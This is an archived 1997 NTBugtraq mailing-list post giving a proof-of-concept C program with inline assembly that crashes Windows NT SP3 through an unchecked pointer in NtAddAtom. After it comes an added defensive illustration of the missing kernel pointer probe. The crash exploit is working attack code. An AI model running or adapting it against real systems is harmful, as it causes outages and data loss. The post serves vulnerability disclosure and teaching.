From craiu@GECAD.RO Wed Aug  6 04:17:35 1997
Date: Tue, 8 Jul 1997 19:51:06 +0300
From: Costin RAIU 
To: NTBUGTRAQ@RC.ON.CA
Subject: Re: [NTSEC] GetAdmin - Technical Background

Todd wrote:
> >This logic is missing in NtAddAtom.  From the looks of things, it's also
> >missing from NtFindAtom.  This is really a variation on the theme of NtCrash.
> > It's a little surprising that Microsoft didn't fully learn the lesson...

Hi everyone,

Here's a small program able to crash a Windows NT machine using
the bug in NtAddAtom. Just a variation of NTCRASH.

However, I have one question: why does getadmin open ntoskrnl.exe
to find the address of NtAddAtom? Using EAX=3/INT2F is "portable"
and does not require any +r access to ntoskrnl.exe.

NOTE: The location of memory overwritten by the kernel is
stored in the "a" array. In this exploit the kernel does
a write operation to FFFFFFFF: instant crash
(at least on my machine).

BTW: This program is for academic and learning purposes.
No criminal intention at all.

---------------------------------------------------
/*

A program to bring the BSOD using the bug in NtAddAtom. Works with SP3.
Author: Costin RAIU,
Compile with VC++ (32-bit, inline _asm)

*/

/* Argument block handed to the kernel. NtAddAtom takes two pointers
   (the atom name to read and the location where the resulting atom is
   written). Both are set to 0xFFFFFFFF, a kernel-space address that the
   unchecked service dereferences, faulting in ring 0. */
void *a[2];

int main(void){
     int i;
     for (i=0;i<2;i++) a[i]=(void*)(0xffffffffL);

     /* NT system call gate: EAX = system service number (3 = NtAddAtom
        on this build), EDX = pointer to the argument block, INT 2Eh
        enters the kernel. The machine does not come back from this. */
     _asm
        {
        mov eax,3
        mov edx,offset a
        int 02eh
        }

     return 0;
}
----------------------------------------------------
bye,
c0s

Costin RAIU, Data Security Expert

E-MAIL  : BUSINESS mailto:craiu@gecad.ro, PERSONAL craiu@usa.net
PGP Key : http://www.gecad.ro/~craiu/craiu.asc (or search www.pgp.com)
KeyID   : 2048/DD35A295 Costin RAIU 
Key fingerprint = FD 14 2A 90 64 41 58 9A  6B 34 47 D8 C5 E2 F4 5C
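The check the thread says is missing, as an added illustration that is not code from the original post or from GetAdmin: a user-mode model of the user-pointer probing an NT system service is expected to perform on its argument block before dereferencing anything in it. Addresses are modelled as 32-bit values so the program builds and runs on any host. The two-pointer layout follows the post's `a[]` array and the NtAddAtom prototype (name pointer read, atom pointer written); MM_USER_PROBE_ADDRESS is the 32-bit NT user/kernel boundary, while the function names, the argument order and the status handling are assumptions made for this example.

```c
/*
 * Added illustration, not code from the original post: a user-mode model
 * of the user-pointer probing an NT system service must perform on its
 * argument block before dereferencing anything in it. Addresses are
 * modelled as uint32_t so this builds and runs on any host; the function
 * names and the status handling are assumptions for the example.
 */
#include <stdint.h>
#include <stdio.h>

/* NTSTATUS codes as defined by Windows. */
#define STATUS_SUCCESS               0x00000000u
#define STATUS_DATATYPE_MISALIGNMENT 0x80000002u
#define STATUS_ACCESS_VIOLATION      0xC0000005u

/* MmUserProbeAddress on 32-bit NT: the first address a user-mode caller
 * may NOT hand the kernel. Everything from here up is kernel space. */
#define MM_USER_PROBE_ADDRESS 0x7FFF0000u

/*
 * Same bounds logic as ProbeForRead/ProbeForWrite: the range
 * [addr, addr+len) must not wrap around the address space, must lie
 * entirely below the user/kernel boundary, and must be naturally aligned
 * for the access size. A service that skips this (the NtAddAtom case in
 * the post) takes 0xFFFFFFFF from ring 3 and faults in ring 0.
 */
static uint32_t probe_user_range(uint32_t addr, uint32_t len, uint32_t align)
{
    if (len == 0)
        return STATUS_SUCCESS;                 /* nothing will be touched */
    if (addr + len < addr)                     /* wrapped past 0xFFFFFFFF */
        return STATUS_ACCESS_VIOLATION;
    if (addr + len > MM_USER_PROBE_ADDRESS)    /* reaches into kernel space */
        return STATUS_ACCESS_VIOLATION;
    if (addr & (align - 1))                    /* misaligned for the access */
        return STATUS_DATATYPE_MISALIGNMENT;
    return STATUS_SUCCESS;
}

/*
 * Entry validation for a two-pointer argument block like the one the post
 * builds in a[]: NtAddAtom(PWSTR AtomName, PUSHORT Atom). The name is read
 * (only its first WCHAR is probed here; a real capture walks the whole
 * string), the atom is written. Nothing is dereferenced until both pass.
 */
static uint32_t check_add_atom_args(uint32_t atom_name, uint32_t atom_out)
{
    uint32_t st = probe_user_range(atom_name, sizeof(uint16_t), sizeof(uint16_t));
    if (st != STATUS_SUCCESS)
        return st;
    return probe_user_range(atom_out, sizeof(uint16_t), sizeof(uint16_t));
}

int main(void)
{
    /* The post's argument block: both pointers 0xFFFFFFFF. */
    printf("a[] = {0xFFFFFFFF, 0xFFFFFFFF}: 0x%08X\n",
           check_add_atom_args(0xFFFFFFFFu, 0xFFFFFFFFu));
    /* Constructed well-formed call: name in an image page, output on a
     * typical NT 4 user-stack address (both values made up for the demo). */
    printf("valid user pointers:             0x%08X\n",
           check_add_atom_args(0x00401000u, 0x0012FF7Cu));
    return 0;
}
```

With the post's values the probe rejects the block with STATUS_ACCESS_VIOLATION before any kernel-mode access happens; the caller gets an error instead of the machine getting a blue screen. The alignment test is what turns an odd output pointer into STATUS_DATATYPE_MISALIGNMENT rather than a misaligned kernel write.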